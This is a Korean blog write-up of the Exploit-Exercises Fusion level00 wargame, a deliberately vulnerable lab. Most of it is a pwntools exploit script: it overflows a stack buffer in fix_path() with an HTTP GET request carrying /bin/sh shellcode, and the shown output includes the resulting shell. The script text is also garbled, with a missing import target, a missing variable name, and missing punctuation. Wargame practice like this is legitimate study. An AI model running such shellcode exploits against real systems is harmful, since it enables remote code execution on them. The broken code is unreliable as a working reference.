Zer0 day

[Exploit-Exercise] Fusion level00 본문

Wargames/Exploit-Exercises

[Exploit-Exercise] Fusion level00

Zero Day 2016.08.29 00:19

Fusion Level00

- There aren't any memory protections even NX. So i just use shell-code.

- That service is on port 20000. and be careful at 'fd'.

- In fix_path(), There is stack buffer overflow vulnerability.

- RET -> 140 ~ 143

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import 
 
# dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh
sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
 
= remote('192.168.56.136'20000)
 
buf = int((s.recv(1024).split(' '))[4], 16)
print "[+] Buffer at %s" % hex(buf)
 
payload = "GET "
payload += "A"*139
payload += p32(buf + 158# ret -> to shellcode
payload += " HTTP/1.1"
payload += sc
 
s.send(payload)
s.interactive()
cs

1
2
3
4
5
6
zero@ubuntu:~/Desktop$ python fusion0.py
[+] Opening connection to 192.168.56.136 on port 20000: Done
[+] Buffer at 0xbf919b88
[*] Switching to interactive mode
$ id
uid=20000 gid=20000 groups=20000
cs

'Wargames > Exploit-Exercises' 카테고리의 다른 글

[Exploit-Exercise] Fusion level02  (0) 2016.08.29
[Exploit-Exercise] Fusion level01  (1) 2016.08.29
[Exploit-Exercise] Fusion level00  (0) 2016.08.29
[Exploit-Exercise] Nubula Solutions  (0) 2015.11.25
0 Comments
댓글쓰기 폼